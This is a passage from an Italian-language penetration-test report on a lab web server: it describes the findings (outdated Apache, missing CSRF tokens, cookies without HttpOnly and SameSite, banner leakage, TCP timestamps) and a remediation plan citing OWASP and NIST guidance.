Abbiamo quindi deciso di cercare se ci sono vulnerabilità note per le versioni 
in uso dalla vittima, ovvero: 

- Apache 2.4.38
- PHP 7.2.31

La versione in uso per quanto riguarda PHP risulta essere sicura.

Lo stesso non può essere detto per Apache, infatti la versione 2.4.38 presenta 
ben 
[10 vulnerabilità](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-278546/Apache-Http-Server-2.4.38.html) 
applicabili da remoto, con un livello di importanza che oscilla tra MEDIUM e HIGH.

### Altre vulnerabilità [\textcolor{gold}{LOW}]

Ora elencheremo altre vulnerabilità. Non le tratteremo tutte singolarmente in quanto le 
PoC sono se non banali, molto simili a quelle già viste.

#### CSRF

Sulla pagina di login e su quella di recovery è stata notata la mancanza del token
anti-CSRF. Abbiamo quindi deciso di provare a sfruttare questa vulnerabilità, 
riuscendoci con una PoC molto simile a quella vista per la diffusione dell'attacco 
di [XSS](#reflected-xss). Nonostante in questo caso sia possibile inviare solo username 
e password, tale vulnerabilità deve essere tenuta in considerazione in vista di 
una possibile espansione dell'area privata, che potrebbe aumentare il rischio e 
l'impatto di attacchi di questo genere.

#### Cookie sniffing

Abbiamo notato che il cookie generato dal sito non sfrutta i parametri 
`HttpOnly` e `SameSite`. Lo scopo di tali parametri è quello di impedire 
ad un attaccante di trafugare il cookie di un utente mediante l'uso di 
javascript (`HttpOnly`) e mediante siti malevoli (`SameSite`).
Attenuanti di tale vulnerabilità sono il fatto che per ora il sito usi 
il cookie solo per salvare `PHPSESSID` e che il suo tempo di vita sia 
limitato alla sessione.
Tuttavia, anche se il cookie dura solo una sessione, potrebbe comunque 
essere trafugato per fingersi un altro utente con il back-end.

#### Stampa di informazioni non necessarie

Abbiamo notato, anche durante la fase di 
[raccolta delle informazioni](#banner-grabbing), 
che il sito in analisi tende a condividere con facilità le sue informazioni.
Abbiamo infatti visto che non viene fatto nulla affinchè le operazioni di 
[banner grabbing](#banner-grabbing) siano rese più complicate; basta una 
richiesta `HTTP` e ci vengono forniti nomi e versioni dei software.

#### Timestamp dei pacchetti TCP

Grazie a `gvm`, abbiamo scoperto che l'host remoto usa i timestamp sui 
pacchetti `TCP`; questa funzionalità permette però di calcolare il 
tempo di funzionamento del sistema bersaglio.

Ciò è stato scoperto inviando pacchetti speciali a distanza di `1s`, 
per poi cercare i timestamp nelle risposte.

\newpage

# Remediation plan

In questo capitolo andremo ad elencare le contromisure che riteniamo necessarie 
per risolvere le vulnerabilità che abbiamo evidenziato.
Nel fare ciò cercheremo di seguire un ordine decrescente di importanza.

#. Inserire controlli per prevenire SQLi, questi riguardano
	la validazione dell'input che può essere fornito dall'utente, anche in 
	caso non sia previsto che questo possa inserirlo (come nel caso 
	della pagina [detail.php](http://172.17.0.2/detail.php).
	Per adempire a tale operazione, consigliamo di seguire la 
	[checklist fornita da OWASP](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html).
#. Anche per la prevenzione di attachi di tipo XSS è necessario imolementare 
	controlli sull'input. Come per il punto *1*, consigliamo di seguire una 
	[checklist fornita da OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html), 
	in questo caso riguardate la vulnerabilità in questione.
#. Assicurarsi che i controlli implementati ai passi *1* e *2* siano implementati
	se non solo server-side, anche server-side.
#. Per quanto riguarda le vulnerabilità del software, consigliamo effettuare gli 
	aggiornamenti di sicurezza; questi dovrebbero risolvere i problemi di 
	sicurezza senza impattare sulla stabilità della piattaforma.
	Vogliamo inoltre sottolineare che *Apache* mantiene un tracciamento delle 
	proprie vulnerabilità sul [sito ufficiale](https://httpd.apache.org/security/vulnerabilities_24.html).
#. Forzare la trasmissione di dati sensibili, come username e password, tramite 
	connessioni cifrate (`SSL/TLS`). Inoltre assicurarsi che eventuali redirezionamenti 
	siano effettuati solo a pagine sicure prima di consentire l'input di dati 
	sensibili.
#. Forzare gli utenti a scegliere password lunghe e robuste, quindi implementare 
	controlli su queste. Consigliamo di seguire le [linee guida del *NIST*](https://pages.nist.gov/800-63-3/) 
	e la [checklist di OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html)
	per procedere con tali operazioni.
#. Assicurarsi che l'opzione `X-Frame-Options` sia usata da tutte le pagine del sito.
	Tale paramentro può assumere diversi valori in funzione del comportamento desiderato:
	
	- `SAMEORIGIN`: per avere i frame solo all'interno del proprio sito
	- `DENY`: per impedire che una pagina sia inclusa in un frame

	Per maggiori informazioni su tale opzione consigliamo di consultare la 
	[pagina](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options) 
	hostata da Mozilla.
#. Per impedire attacchi di tipo CSRF, consigliamo di seguire la 
	[checklist fornita da OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html).
#. Consigliamo di impostare le variabili `HttpOnly` e `SameSite` a `true` all'interno 
	dei cookie generati dalla pagina.
#. Raccomandiamo che le varie componenti del sistema sopprimano gli header 
	contenenti nomi e versioni dei software utilizzatia.
#. Consigliamo di disattivare l'opzione per i timestamp all'interno dei 
	pacchetti `TCP` seguendo la [guida prodotta da Whonix](https://www.whonix.org/wiki/Disable_TCP_and_ICMP_Timestamps).
